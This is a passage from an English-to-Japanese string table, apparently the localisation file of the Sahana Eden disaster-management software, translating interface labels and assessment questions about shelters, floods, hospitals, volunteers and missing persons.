'Edit Unit': '単位の編集',
'Edit User': 'ユーザの編集',
'Edit Volunteer Details': 'ボランティアの詳細を編集する',
'Edit Volunteer Registration': 'ボランティア登録の編集',
'Edit Warehouse Item': '倉庫物資を編集',
'Edit Warehouse': '倉庫を編集',
'Edit current record': '現在のレコードの編集',
'Edit message': 'メッセージの編集',
'Edit the Application': 'アプリケーションの編集',
'Edit': '編集',
'Editable?': '編集可能?',
'Education materials received': '教育資材を受領した',
'Education materials, source': '教育資材の送付元',
'Education': '教育',
'Effects Inventory': '備蓄物資への影響',
'Eggs': '卵',
'Either a shelter or a location must be specified': '避難所かロケーションのどちらかを特定する必要があります',
'Either file upload or document URL required.': 'ファイルのアップロードと文書のURLの両方が必要です。',
'Either file upload or image URL required.': 'アップロードするファイルか、URLを指定してください。',
'Elderly person headed households (>60 yrs)': '代表者が60歳以上の世帯数',
'Electrical': '電動の',
'Electrical, gas, sewerage, water, hazmats': '電気、ガス、下水道、水、有害物',
'Elevated': '高まる',
'Elevators': 'エレベーター',
'Email Address': 'メールアドレス',
'Email Settings': '電子メール設定',
'Email address verified, however registration is still pending approval - please wait until confirmation received.': '電子メールの認証は完了しましたが、登録はまだ完了していません。確認が完了するまで少々お待ちください。',
'Email settings updated': '電子メールの設定を更新しました',
'Email verification': '利用者登録の確認',
'Email': '電子メール',
'Embalming': '遺体防腐処理',
'Embassy': '大使館',
'Emergency Capacity Building project': 'ECB (緊急対応能力強化プロジェクト)',
'Emergency Department': '救急部門',
'Emergency Shelter': '緊急避難所',
'Emergency Support Facility': '緊急支援施設',
'Emergency Support Service': '緊急支援サービス',
'Emergency Telecommunications': '緊急通信',
'Enable/Disable Layers': 'レイヤの有効化/無効化',
'Enabled': '有効',
'End date should be after start date': '終了日付は開始日付より後にしてください',
'End date': '終了日',
'End of Period': '終了期間',
'English': 'English 英語',
'Enter Coordinates': '緯度経度を入力',
'Enter Coordinates:': '座標入力:',
'Enter a GPS Coord': 'GPS Coordを入力',
'Enter a GPS Coordinate': 'GPS座標を入力してください',
'Enter a date before': '以前の日時を入力',
'Enter a few characters of the name to select an existing Location or else simply type the name of the new Location.': '最初の数文字を入力して既存の項目から選ぶか、あるいは新しいロケーション名を入力して、ロケーションを特定してください。',
'Enter a name for the spreadsheet you are uploading (mandatory).': 'アップロードするスプレッドシートの名前を入力してください。(必須項目)',
'Enter a new support request.': '新規の支援要請を登録',
'Enter a summary of the request here.': '要求事項の概要を入力',
'Enter a unique label!': 'そのラベル名は使われています。一意のラベル名を入力してください。',
'Enter a valid date before': 'より前の正しい日付を入力してください',
'Enter a valid email': '正しいメールアドレスを入力してください',
'Enter a valid future date': '正しい未来の日付を入力してください',
'Enter some characters to bring up a list of possible matches': '文字を入力することで、候補の一覧が表示されます',
'Enter some characters to bring up a list of possible matches.': '検索文字列を入力してください',
'Enter tags separated by commas.': 'タグはカンマで区切って入力してください。',
'Enter the same password as above': '確認のため、パスワードを再入力',
'Enter your firstname': 'あなたの名前を入力',
'Entered': '入力された',
'Entering a phone number is optional, but doing so allows you to subscribe to receive SMS messages.': '電話番号の入力は任意です。入力すると、SMS メッセージの受け取り登録ができます。',
'Entering an Organization is optional, but doing so directs you to the appropriate approver & means you automatically get the appropriate permissions.': '選択リストに含まれる団体のメンバーであれば、所属する団体を選択してください。(団体の選択は必須ではありません)',
'Entry deleted': 'エントリを削除しました',
'Environment': '環境',
'Equipment': '備品',
'Error encountered while applying the theme.': 'テーマ適用時にエラーが発生しました。',
'Error in message': 'エラーメッセージ',
"Error logs for '%(app)s'": '"%(app)s" に関するエラーログ',
'Errors': 'エラー',
'Estimated # of households who are affected by the emergency': '非常事態の影響を受けた世帯の推定数',
'Estimated # of people who are affected by the emergency': '非常事態の影響を受けた住民の推定数',
'Estimated Overall Building Damage': '建物全体の被害見積り',
'Estimated total number of people in institutions': 'なんらかの施設に収容されている住民の推定数',
'Euros': 'ユーロ',
'Evacuating': '退避中',
'Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)': 'このメッセージの情報を評価します。(この値は、公開される警告アプリケーションで使用してはなりません)',
'Event Time': 'イベント発生時刻',
'Event Type': 'イベントタイプ',
'Event type': 'イベントタイプ',
'Example': '例',
'Exceeded': '超過',
'Exclude contents': 'コンテンツを除く',
'Excreta disposal': 'し尿処理',
'Execute a pre-planned activity identified in <instruction>': '事前に準備していた計画 <instruction>を実行する',
'Existing Placard Type': '設置されたポスターのタイプ',
'Existing food stocks': '食糧備蓄あり',
'Existing food stocks, main dishes': '備蓄中の食料(主皿)',
'Existing food stocks, side dishes': '備蓄中の食料(副皿)',
'Exits': '出口',
'Expected In': '入庫予定',
'Expected Out': '出庫予定',
'Experience': '熟練者',
'Expiry Date': '有効期限',
'Expiry Time': '有効期限',
'Expiry_Date': '有効期限',
'Explosive Hazard': '爆発災害',
'Export Data': 'データのエクスポート',
'Export Database as CSV': 'データベースをCSV形式でエクスポート',
'Export in GPX format': 'GPXフォーマットでエクスポート',
'Export in KML format': 'KMLフォーマットでエクスポート',
'Export in OSM format': 'OSMフォーマットでエクスポート',
'Export in PDF format': 'PDFフォーマットでエクスポート',
'Export in RSS format': 'RSSフォーマットでエクスポート',
'Export in XLS format': 'XLSフォーマットでエクスポート',
'Export': 'エクスポート',
'Exterior Only': '外装のみ',
'Exterior and Interior': '外装と内装',
'External Features': '外部機能',
'Eye Color': '目の色',
'Facial hair, color': 'ヒゲ, 色',
'Facial hair, type': 'ヒゲ, 形状',
'Facial hear, length': 'ヒゲ, 長さ',
'Facility Operations': '施設の運用',
'Facility Status': '施設の状態',
'Facility Type': '施設タイプ',
'Factors affecting school attendance': '生徒の就学に影響する要因',
'Failed to send mail to Approver - see if you can notify them manually!': '承認依頼メールを送信できませんでした。利用者登録は完了していません。サイト管理者へ連絡してください。',
'Failed!': '失敗しました!',
'Falling Object Hazard': '落下/墜落による災害',
'Families/HH': '家族/世帯',
'Family tarpaulins received': 'タープ(家族用簡易テント)を受領した',
'Family tarpaulins, source': 'タープ(家族用簡易テント)の送付元',
'Family': '家族',
'Family/friends': '家族/友人',
'Farmland/fishing material assistance, Rank': '農業 / 漁業用物資の補助、ランク',
'Fatalities': '死亡者',
'Fax': 'ファックス',
'Feature Layer Details': '機能レイヤの詳細',
'Feature Layer added': '機能レイヤを追加しました',
'Feature Layer deleted': '機能レイヤを削除しました',
'Feature Layer updated': '機能レイヤを更新しました',
'Feature Layers': '機能レイヤ',
'Feature Namespace': 'Feature 名前空間',
'Feature Request': '機能の要求',
'Feature Type': 'Feature タイプ',
'Feature': '機能',
'Features Include': '含まれる機能',
'Female headed households': '代表者が女性の世帯数',
'Female': '女性',
'Few': '少数',
'Field Hospital': '野外病院',
'File': 'ファイル',
'Fill in Latitude': '緯度を記入',
'Fill in Longitude': '経度を記入',
'Fill out Rapid Evaluation Forms': '迅速評価フォームに記入します',
'Fill out detailed Evaluation Forms': '詳細な評価フォームに入力する',
'Filter Field': 'フィールドをフィルタする',
'Filter Value': '値をフィルタ',
'Filter': 'フィルタ',
'Filtered search of aid pledges and requests': '援助申出と要請の検索されたもの',
'Find All Matches': '完全一致',
'Find Dead Body Report': '遺体レポートの発見',
'Find Hospital': '病院を探す',
'Find Person Record': '人物情報を検索',
'Find Recovery Report': '遺体発見レポート',
'Find Volunteers': 'ボランティアを探す',
'Find a Person Record': '人物情報を検索する',
'Find by Name': '名前で検索',
'Find': '検索',
'Finder': '発見者',
'Fingerprint': '指紋',
'Fingerprinting': '指紋',
'Fingerprints': '指紋',
'Finish': '完了',
'Finished Jobs': '完了したジョブ',
'Fire suppression and rescue': '消火・救出活動',
'Fire': '火災',
'First Name': '名',
'First name': '名',
'Fishing': '漁業',
'Flash Flood': '鉄砲水',
'Flash Freeze': '瞬間凍結',
'Fleet Management': '車両管理',
'Flexible Impact Assessments': '災害影響範囲アセスメント',
'Flood Alerts show water levels in various parts of the country': '洪水警報では、国内各所の水位情報を確認することができます。',
'Flood Alerts': '洪水警報',
'Flood Report Details': '洪水レポートの詳細',
'Flood Report added': '洪水レポートを追加しました',
'Flood Report deleted': '洪水レポートを削除しました',
'Flood Report updated': '洪水レポートを更新しました',
'Flood Report': '洪水レポート',
'Flood Reports': '洪水レポート',
'Flood': '洪水',
'Flow Status': '流れの状況',
'Focal Point': '代表者',
'Fog': '濃霧',
'Food Supply': '食料の供給',
'Food assistance available/expected': '食糧援助が利用可能 / 期待できる',
'Food assistance': '食糧援助',
'Food': '食料',
'Footer file %s missing!': 'フッターファイル%sが見つかりません。',
'Footer': 'フッタ',
'For Eden instances enter the application base URL, e.g. http://sync.sahanfoundation.org/eden, for other peers the URL of the synchronization interface.': 'Eden の場合はベースURL(例えば http://sync.sahanfoundation.org/eden)、他のシステムの場合は同期インターフェースのURL。',
'For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP).': 'POP-3では通常110 (SSLでは995)で、IMAPでは通常143 (IMAPSでは993)。',
'For Warehouse': '倉庫向け',
'For a country this would be the ISO2 code, for a Town, it would be the Airport Locode.': '国の場合は ISO2 コード、町の場合は 空港コード(Airport Locode)',
'For each sync partner, there is a default sync job that runs after a specified interval of time. You can also set up more sync jobs which could be customized on your needs. Click the link on the right to get started.': 'それぞれの同期パートナーについて、指定した間隔で実行する同期ジョブがデフォルトで存在します。必要に応じて、さらなる同期ジョブを設定し、カスタマイズすることができます。開始するには、リンクをクリックしてください。',
'For enhanced security, you are recommended to enter a username and password, and notify administrators of other machines in your organization to add this username and password against your UUID in Synchronization -> Sync Partners': 'セキュリティ向上のため、ユーザー名とパスワードを入力し、団体の他端末の管理者にユーザー名とパスワードを通知して「データ同期」 -> 「データ同期パートナー」であなたのUUIDに追加してもらうことを推奨します。',
'For live help from the Sahana community on using this application, go to': 'Sahanaの使い方について Sahanaコミュニティからライブヘルプを希望する際は、以下に進んでください。',
'For messages that support alert network internal functions': '警戒(alert)ネットワークの内部機能をサポートするメッセージの場合',
'For more details on the Sahana Eden system, see the': 'Sahana Edenに関する詳細は、以下をごらんください。',
'For more information, see ': '詳細は、以下を参照してください。',
'For other types, the next screen will allow you to enter the relevant details...': 'その他の種類については、次の画面で関連する詳細情報を入力できます…',
'For': ' ',
'For:': '対象:',
'Forest Fire': '森林火災',
'Formal camp': '指定避難所',
'Format': 'フォーマット',
'Forms': 'フォーム',
'Found': '発見された',
'Foundations': '構造基礎',
'Freezing Drizzle': '凍結霧雨',
'Freezing Rain': 'みぞれ',
'Freezing Spray': '着氷性の飛沫',
'French': 'フランス語',
'Friday': '金曜日',
'From Inventory': '送付元',
'From Location': '送付元ロケーション',
'From Organization': '送付元団体',
'From Person': '送付元の担当者',
'From Warehouse': '倉庫から',
'From': '輸送元',
'Frost': '凍結',
'Fulfil. Status': '充足状況',
'Fulfillment Status': '充足状況',
'Full beard': 'もみあげまでのアゴヒゲ、口髭あり',
'Full': '満員',
'Fullscreen Map': 'フルスクリーン表示',
'Function Permissions': '機能に対する権限',
'Function': '機能',
'Functional Tests': '機能テスト',
'Functions available': '利用可能な機能',
'Funding Organization': '資金提供団体',
'Funeral': '葬儀',
'Further Action Recommended': '更なる対応が推奨されている',
'GIS Reports of Shelter': '避難所のGISレポート',
'GIS integration to view location details of the Shelter': '避難所のロケーション詳細を閲覧するGISインテグレーション',
'GPS Marker': 'GPSマーカー',
'GPS Track File': 'GPS Track ファイル',
'GPS Track': 'GPS トラック',
'GPX Layers': 'GPX レイヤ',
'GPX Track': 'GPX形式の追跡情報',
'GRN Status': 'GRNステータス',
'Gale Wind': '強風',
'Gantt Chart': 'ガントチャート',
'Gap Analysis Map': 'ギャップ解析マップ',
'Gap Analysis Report': 'ギャップ解析報告',
'Gap Analysis': 'ギャップ解析',
'Gap Map': '需給ギャップマップ',
'Gap Report': '需給ギャップの報告',
'Gateway Settings': 'ゲートウェイ設定',
'Gateway settings updated': 'ゲートウェイ設定を更新しました',
'Gender': '性別',
'General Comment': '包括コメント',
'General Medical/Surgical': '一般医学/外科',
'General emergency and public safety': '一般的緊急事態と公共の安全',
'General information on demographics': '人口統計の情報',
'Generator': '発電機',
'Geocoder Selection': 'Geocoder 選択',
'Geometry Name': 'Geometry名',
'Geonames.org search requires Internet connectivity!': 'Geonames.org の検索を行うには、インターネットに接続している必要があります。',
'Geophysical (inc. landslide)': '地球物理 (地滑りを含む)',
'Geotechnical Hazards': '地盤災害',
'Geotechnical': '地質工学',
'Geraldo module not available within the running Python - this needs installing for PDF output!': '実行中のPythonでGeraldoモジュールが利用できません。PDF出力に必要です。',
'Geraldo not installed': 'Geraldoがインストールされていません',
'Get incoming recovery requests as RSS feed': '遺体回収要請をRSSフィードとして取得する',
'Girls 13-18 yrs in affected area': '影響地域内の13-18歳の女子数',
'Girls 13-18 yrs not attending school': '学校に通っていない13-18歳の女子数',
'Girls 6-12 yrs in affected area': '影響地域内の6-12歳の女子数',
'Girls 6-12 yrs not attending school': '学校に通っていない6-12歳の女子数',
'Give a brief description of the image, e.g. what can be seen where on the picture (optional).': '画像に関する説明。特に、写真のどの箇所に何が確認できるかを記載します (オプション)',
'Give information about where and when you have seen the person': '人物を見かけた場所や時間の情報を提供してください',
'Give information about where and when you have seen them': 'どこで、いつ、彼らを見かけたのか、情報をください',
'Global Messaging Settings': 'メッセージの全般設定',
'Glossary': '用語集',
'Go to Request': '支援要請に行く',
'Goatee': 'やぎヒゲ',
'Goods Received Note': '物資受領書',
'Government UID': '政府UID',
'Government building': '政府所管の建物',
'Government': '政府・行政機関',
'Grade': '学年',
'Greek': 'ギリシャ語',
'Green': '緑',
'Ground movement, fissures': '地盤移動、亀裂',
'Ground movement, settlement, slips': '地盤移動、沈下、がけ崩れ',
'Group %(group_id)s created': 'グループ %(group_id)s を作成しました',
'Group Description': 'グループの説明',
'Group Details': 'グループの詳細',
'Group ID': 'グループID',
'Group Member added': 'グループメンバを追加しました',
'Group Members': 'グループメンバ',
'Group Memberships': 'グループメンバシップ',
'Group Name': 'グループ名',
'Group Title': 'グループのタイトル',
'Group Type': 'グループのタイプ',
'Group added': 'グループを追加しました',
'Group deleted': 'グループを削除しました',
'Group description': 'グループの説明',
'Group name': 'グループ名',
'Group type': 'グループタイプ',
'Group updated': 'グループを更新しました',
'Group': 'グループ',
'Groups removed': 'グループを削除しました',
'Groups': 'グループ',
'Guest': 'ゲスト',
'HR Data': '人的資源の情報',
'HR Manager': '人的資源マネージャー',
'Hail': 'あられ',
'Hair Color': '頭髪の色',
'Hair Length': '頭髪の長さ',
'Hair Style': 'ヘアスタイル',
'Has additional rights to modify records relating to this Organization or Site.': 'この団体やサイトに関連するレコードを変更するための権限を追加します',
'Has data from this Reference Document been entered into Sahana?': 'リファレンス文書の内容が Sahanaに登録してあるかどうかを記載してください。',
'Has only read-only access to records relating to this Organization or Site.': 'この団体やサイトに関連するレコードを閲覧のみに制限します',
'Has the safety and security of women and children in your community changed since the emergency?': '緊急事態以来、女性や未成年の生活の危険度が変化したかどうかを記載してください',
'Has your business been damaged in the course of the disaster?': '災害の過程で、ビジネス上の損害を受けているかどうかを記載してください',
'Have households received any shelter/NFI assistance or is assistance expected in the coming days?': '世帯に対して避難所用品や生活必需品が配布されている、あるいは数日以内に配布を実施できるかを記載してください',
'Have normal food sources been disrupted?': '平常時の食料調達源が利用不可能になったかどうかを記載してください',
'Have schools received or are expecting to receive any assistance?': '学校に対してなんらかの支援が行われた、あるいは行われる予定であるかどうかを記載してください',
'Have the people received or are you expecting any medical or food assistance in the coming days?': '医療品や食糧支援を、被災者、あるいはあなたが受領したかどうか、あるいは数日以内に受領できそうかどうかを記載してください。',
'Hazard Pay': '危険手当',
'Hazardous Material': '危険物',
'Hazardous Road Conditions': '危険な道路状況',
'Header Background': 'ヘッダー背景',
'Header background file %s missing!': 'ヘッダー背景ファイル%sが存在しません。',
'Headquarters': '本部・本社',
'Health care assistance, Rank': '医療 / 介護支援、ランク',
'Health center with beds': '保健所(ベッドあり)',
'Health center without beds': '保健所(ベッドなし)',
'Health center': '保健所',
'Health services functioning prior to disaster': '災害発生以前 ヘルスサービスの提供',
'Health services functioning since disaster': '災害発生後 ヘルスサービスの提供',
'Health services status': '医療サービス状況',
'Health': '保健・介護',
'Healthcare Worker': 'ヘルスケア要員',
'Heat Wave': '熱波',
'Heat and Humidity': '熱と湿度',
'Height (cm)': '身長 (cm)',
'Height': '身長',
'Help': ' ヘルプ ',
'Helps to monitor status of hospitals': '病院の現状把握に役立つ情報を管理します',
'Helps to report and search for Missing Persons': '行方不明者の報告と検索を支援します。',
'Here are the solution items related to the problem.': '問題に関連する解決案です。',
'Heritage Listed': '遺産登録',
'Hide Details': '詳細を隠す',
'Hierarchy Level 0 Name (e.g. Country)': '階層レベル0の名前(例: 国)',
'Hierarchy Level 1 Name (e.g. Province)': '階層レベル1の名前 (例: 都道府県)',
'Hierarchy Level 2 Name': '階層レベル2の名前',
'Hierarchy Level 3 Name': '階層レベル3の名前',
'Hierarchy Level 4 Name': '階層レベル4の名前',
'High Water': '最高水位',
'High': '高',
'Hindu': 'ヒンズー教徒',
'History': '履歴',
'Hit the back button on your browser to try again.': 'ブラウザの「戻る」ボタンを押して、やり直してください。',
'Holiday Address': '休日の住所',
'Home Address': '自宅住所',
'Home Country': '所属国',
'Home Crime': '住居犯罪',
'Home': 'ホーム',
'Hospital Details': '病院の詳細',
'Hospital Status Report': '病院ステータスレポート',
'Hospital information added': '病院情報を追加しました',
'Hospital information deleted': '病院情報を削除しました',
'Hospital information updated': '病院情報を更新しました',
'Hospital status assessment.': '病院ステータスアセスメント',
'Hospital': '病院',
'Hospitals': '病院情報',
'Hot Spot': 'ホットスポット',
'Hour': '時間',
'Hourly': '1時間毎',
'Household kits received': '家事用品を受領しました',
'Household kits, source': '家事用品の送付元',
'How did boys 13-17yrs spend most of their time prior to the disaster?': '災害発生前、13-17歳の男子がよく集まっていた場所と活動は?',
'How did boys <12yrs spend most of their time prior to the disaster?': '災害発生前、12歳以下の男子がよく集まっていた場所と活動は?',
'How did boys girls 13-17yrs spend most of their time prior to the disaster?': '災害発生前、13-17歳の女子がよく集まっていた場所と活動は?',
'How did girls <12yrs spend most of their time prior to the disaster?': '災害発生前、12歳以下の女子がよく集まっていた場所と活動は?',
'How do boys 13-17yrs spend most of their time now?': '現在、13-17歳の男子は普段何をして過ごしていますか?',
'How do boys <12yrs spend most of their time now?': '現在、12歳以下の男子は普段何をして過ごしていますか?',
'How do girls 13-17yrs spend most of their time now?': '現在、13-17歳の女子は普段何をして過ごしていますか?',
'How do girls <12yrs spend most of their time now?': '現在、12歳以下の女子は普段何をして過ごしていますか?',
'How does it work?': 'どのように動きますか?',
'How is this person affected by the disaster? (Select all that apply)': 'この人物の被災状況を記載してください(該当する項目を全て選択)',
'How long does it take you to reach the available water resources? Specify the time required to go there and back, including queuing time, by foot.': '水資源を確保できる地点までの距離を記載します。徒歩で往復し、待ち時間も含めた時間を記載してください。',
'How long does it take you to walk to the health service?': '医療サービスが提供されている場所まで、徒歩で必要な時間を記載します。',
'How long will the food last?': '食料がなくなるまでの期間',
'How long will this water resource last?': '水の供給が枯渇する時期',
'How many Boys (0-17 yrs) are Dead due to the crisis': '災害で死亡した少年の数(0-17歳)',
'How many Boys (0-17 yrs) are Injured due to the crisis': '災害で負傷した少年の数(0-17歳)',
'How many Boys (0-17 yrs) are Missing due to the crisis': '災害で行方不明となった少年の数(0-17歳)',
'How many Girls (0-17 yrs) are Dead due to the crisis': '災害で死亡した少女の数(0-17歳)',
'How many Girls (0-17 yrs) are Injured due to the crisis': '災害で負傷した少女の数(0-17歳)',
'How many Girls (0-17 yrs) are Missing due to the crisis': '災害で行方不明になった少女の数(0-17歳)',
'How many Men (18 yrs+) are Dead due to the crisis': '災害で死亡した男性の数(18歳以上)',
'How many Men (18 yrs+) are Injured due to the crisis': '災害で負傷した男性の数(18歳以上)',
'How many Men (18 yrs+) are Missing due to the crisis': '災害で行方不明となった男性の数(18歳以上)',
'How many Women (18 yrs+) are Dead due to the crisis': '災害で死亡した女性の数(18歳以上)',
'How many Women (18 yrs+) are Injured due to the crisis': '災害で負傷した女性の数(18歳以上)',
'How many Women (18 yrs+) are Missing due to the crisis': '災害で行方不明となった女性の数(18歳以上)',
'How many days will the supplies last?': '支援物資がなくなるまでの日数',
'How many doctors in the health centers are still actively working?': 'ヘルスセンター内の医師の人数を記載してください',
'How many houses are uninhabitable (uninhabitable = foundation and structure destroyed)?': '居住不可になった家屋数を記載してください(居住不可 = 基礎構造や土台部分の破壊など)',
'How many houses suffered damage but remain usable (usable = windows broken, cracks in walls, roof slightly damaged)?': '災害によって破損したが、まだ利用が可能である住居の数を記載してください(利用可能 = 窓の破壊、壁のヒビ、屋根の軽微な破損など)',
'How many latrines are available in the village/IDP centre/Camp?': '村落/IDPセンター/仮泊施設内で利用可能なトイレの数を記載してください',
'How many midwives in the health centers are still actively working?': '医療センター内の助産師の人数を記載してください',
'How many new cases have been admitted to this facility in the past 24h?': '過去24時間でこの施設で受け入れたケースの数は?',
'How many nurses in the health centers are still actively working?': '保健所で活動可能な看護師は何人居ますか?',
'How many of the patients with the disease died in the past 24h at this facility?': 'この施設で過去24時間で何人の患者がこの病気で亡くなりましたか?',
'How many of the primary school age boys (6-12) in the area are not attending school?': 'この地域の、登校していない学童期男児(6-12歳)の数を記載してください。',
'How many of the primary school age girls (6-12) in the area are not attending school?': 'この地域の、登校していない学童期女児(6-12歳)の数を記載してください。',
'How many of the primary/secondary schools are now open and running a regular schedule of class?': '平常通りの授業を実施できている小学校・中学校・高校の数を記入してください',
'How many of the secondary school age boys (13-18) in the area are not attending school?': 'この地域の、登校していない中高校生年齢男子(13-18歳)の数を記載してください。',
'How many of the secondary school age girls (13-18) in the area are not attending school?': 'この地域の、登校していない女子中高生(13-18歳)の数を記載してください。',
'How many patients with the disease are currently hospitalized at this facility?': 'この病気のためにこの施設に入院している患者は現在何人ですか?',
'How many primary school age boys (6-12) are in the affected area?': '被災地域内の学童期男児(6-12歳)の数を記載してください',
'How many primary school age girls (6-12) are in the affected area?': '被災地域内の学童期女児(6-12歳)の数を記載してください。',
'How many primary/secondary schools were opening prior to the disaster?': '災害発生前に授業が行われていた小学校・中学校・高校の数を記載してください',
'How many secondary school age boys (13-18) are in the affected area?': '被災地域内の男子中学生・男子高校生(13-18歳)の数を記載してください',
'How many secondary school age girls (13-18) are in the affected area?': '被災地域内の中高生年齢女子(13-18歳)の数を記載してください。',
'How many teachers have been affected by the disaster (affected = unable to work)?': '被災し、授業ができない状態の教師の人数を記載してください',
'How many teachers worked in the schools prior to the disaster?': '災害発生前の教師の人数を記載してください',
'How much detail is seen. A high Zoom level means lot of detail, but not a wide area. A low Zoom level means seeing a wide area, but not a high level of detail.': 'どの程度詳細な情報が表示されるかを定義します。ズームすることで詳細が表示されるようになりますが、そのかわり、広域を見渡すことができなくなります。逆に、ズームしないことで広域を表示できますが、詳細情報の確認は行えなくなります。',
'Human Resource Management': '人的資源マネージメント',
'Human Resource': '人的資源',
'Human Resources Management': '人的資源管理',
'Human Resources': '人的資源',
'Humanitarian NGO': '人道支援NGO',
'Hurricane Force Wind': 'ハリケーンの風力',
'Hurricane': 'ハリケーン',
'Hygiene NFIs': '衛生用品',
'Hygiene kits received': '衛生用品を受領した',
'Hygiene kits, source': '衛生用品の送付元',
'Hygiene practice': '衛生習慣',
'Hygiene problems': '衛生上の問題',
'Hygiene': '衛生',
'I am available in the following area(s)': '以下の地域を担当できます',
'ID Label': 'IDラベル',
'ID Label: ': 'IDラベル: ',
'ID Tag Number': 'IDタグ番号',
'ID Tag': 'ID タグ',
'ID type': 'IDタイプ',
'Ice Pressure': '氷結圧力',
'Iceberg': 'アイスバーグ',
'Ideally a full URL to the source file, otherwise just a note on where data came from.': 'できればソースファイルの完全なURLを記載します。難しい場合はデータ入手元のメモでも構いません。',
'Identification Report': 'IDレポート',
'Identification Reports': 'IDレポート',
'Identification Status': 'IDステータス',
'Identification label of the Storage bin.': '備蓄コンテナの区別用ラベル番号。',
'Identification': 'ID',
'Identified as': '判明した身元',
'Identified by': '識別者',
'Identity Details': '身元確認の詳細',
'Identity added': '身元情報を追加しました',
'Identity deleted': '身元確認を削除しました',
'Identity updated': '身元確認を更新しました',
'Identity': '身元確認',
'If Staff have login accounts then they are given access to edit the details of the': 'スタッフがログイン用アカウントを有している場合、以下項目の詳細を編集することができます:',
'If Unit = m, Base Unit = Km, then multiplicator is 0.0001 since 1m = 0.001 km.': '「Unit = m, Base Unit = Km」の場合、「1m = 0.001 km」なので乗数は0.0001 です。',
'If a user verifies that they own an Email Address with this domain, the Approver field is used to determine whether & by whom further approval is required.': 'このドメインの電子メールアドレスを所有するユーザーを認証する場合は、承認がさらに必要かどうか、必要なら誰が承認するか、を決めるのに承認者フィールドを使用します。',
'If enabled then a log is maintained of all records a user accesses. If disabled then it can still be enabled on a per-module basis.': '有効にすると、ユーザーがアクセスしたときに、全てのレコードがログに保存されます。無効にすると、モジュール毎に有効にすることができます。',
'If enabled then a log is maintained of all records a user edits. If disabled then it can still be enabled on a per-module basis.': '有効にすると、ユーザーが編集したすべてのレコードを記録します。無効にすると、モジュール毎に有効にできます。',
'If neither are defined, then the Default Marker is used.': 'もし両方共定義されていない場合、デフォルトマーカーが使われます。',
'If no marker defined then the system default marker is used': 'マーカーが定義されていない場合は、システムのデフォルトマーカーを使用します。',
'If no, specify why': 'いいえ、の場合はその理由を記載してください',
'If none are selected, then all are searched.': 'もしなにも選択しなければ、全てを検索します',
'If the location is a geographic area, then state at what level here.': '場所が地理的に確定できる場所ならば、その場所のレベルを記載してくだい。',
'If the request is for type "Other", you should enter a summary of the request here.': '支援要請が"その他"の場合、概要をここに入力する必要があります',
'If this field is populated then a user with the Domain specified will automatically be assigned as a Staff of this Organization': 'この項目が設定されている場合、ユーザーは、登録の際、この団体のスタッフとして登録されるように指定することができます',
'If this is set to True then mails will be deleted from the server after downloading.': 'Trueに設定されている場合は、メールはダウンロード後にサーバーから削除されます。',
'If this record should be restricted then select which role is required to access the record here.': 'このレコードへのアクセスを制限する際には、アクセスに必要となる権限を選択してください',
'If this record should be restricted then select which role(s) are permitted to access the record here.': 'このレコードを制限したい場合、アクセスを許可する権限を指定してください。',
'If yes, specify what and by whom': '「はい」の場合、供給される食料と供給元',
'If yes, which and how': '「はい」の場合、混乱している場所や原因を記載',
'If you do not enter a Reference Document, your email will be displayed to allow this data to be verified.': '参照文書を入力しない場合は、データ検証のために入力者の電子メールが表示されます。',
'If you know what the Geonames ID of this location is then you can enter it here.': 'このロケーションの Geonames ID がある場合、ここに入力してください。',
'If you know what the OSM ID of this location is then you can enter it here.': 'このロケーションの OSM ID がある場合、ここに入力してください。',
'If you need to add a new document then you can click here to attach one.': '文書の添付はこのページから可能です。',
'If you want several values, then separate with': '複数の値を入力したい場合、この文字で分割してください : ',
'If you would like to help, then please': 'ご協力いただける方は登録をお願いします',
'Illegal Immigrant': '不法移民',
'Image Details': '画像の詳細',
'Image Tags': '画像のタグ',
'Image Type': '画像のタイプ',
'Image Upload': '画像のアップロード',
'Image added': '画像を追加しました',
'Image deleted': '画像を削除しました',
'Image updated': '画像を更新しました',
'Image': '画像',
'Image/Attachment': '画像/添付資料',
'Image/Other Attachment': '画像/その他の添付ファイル',
'Imagery': '画像',
'Images': '画像',
'Immediate reconstruction assistance, Rank': '建築物の緊急修理 / 再建築支援、ランク',
'Impact Assessment Summaries': '災害影響範囲アセスメントの概要',
'Impact Assessments': '災害影響範囲アセスメント',
'Impact Baselines': '影響範囲の基準値',
'Impact Details': '被害の詳細',
'Impact Type Details': '災害影響のタイプ詳細',
'Impact Type added': '災害の影響タイプを追加しました',
'Impact Type deleted': '影響範囲タイプを削除しました',
'Impact Type updated': '災害影響のタイプを更新しました',
'Impact Type': '災害影響タイプ',
'Impact Types': '災害影響のタイプ',
'Impact added': '被災影響を追加しました',
'Impact deleted': '影響範囲を削除しました',
'Impact updated': '被災状況を更新しました',
'Impacts': '影響',
'Import & Export Data': 'データのインポートとエクスポート',
'Import Data': 'データのインポート',
'Import Job': 'Jobのインポート',
'Import Jobs': 'Jobsのインポート',
'Import and Export': 'インポートとエクスポート',
'Import from Ushahidi Instance': 'Ushahidi インスタンスから設定をインポート',
'Import if Master': 'マスターなら取り込む',
'Import job created': 'Import jobを作成しました',
'Import multiple tables as CSV': '複数のテーブルをCSVとしてインポート',
'Import': 'インポート',
'Import/Export': 'インポート/エクスポート',
'Important': '重要',
'Importantly where there are no aid services being provided': '救護サービスが提供されていない地域において重要となります',
'Imported': 'インポートしました',
'Importing data from spreadsheets': 'スプレッドシートからデータをインポートしています',
'Improper decontamination': '不適切な汚染の除去',
'Improper handling of dead bodies': '誤った扱いをされている遺体',
'In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'In GeoServerでは、これはレイヤ名です。WFS getCapabilitiesでは、これはコロン(:)後のFeatureType名の部分です。',
'In GeoServer, this is the Workspace Name. Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'GeoServer では、これはワークスペース名です。WFS getCapabilities では、これはコロン「:」の前の FeatureType の部分となります。',
'In Inventories': 'この物資の在処',
'In Process': '実行中',
'In Progress': '実行中',
'In Transit': '輸送中',
'In Window layout the map maximises to fill the window, so no need to set a large value here.': 'ウィンドウレイアウトでは地図がウィンドウ全体に最大化されるため、ここで大きな値を設定する必要はありません',
'In general, what are the greatest needs of older people, people with disabilities, children, youth and women in your community?': '一般的に、コミュニティ内の高齢者、障がい者、子供、青年、女性たちが最も必要としている物資やサービスがなんであるかを記載してください',
'Inbound Mail Settings': '着信メール設定',
'Inbox': '受信箱',
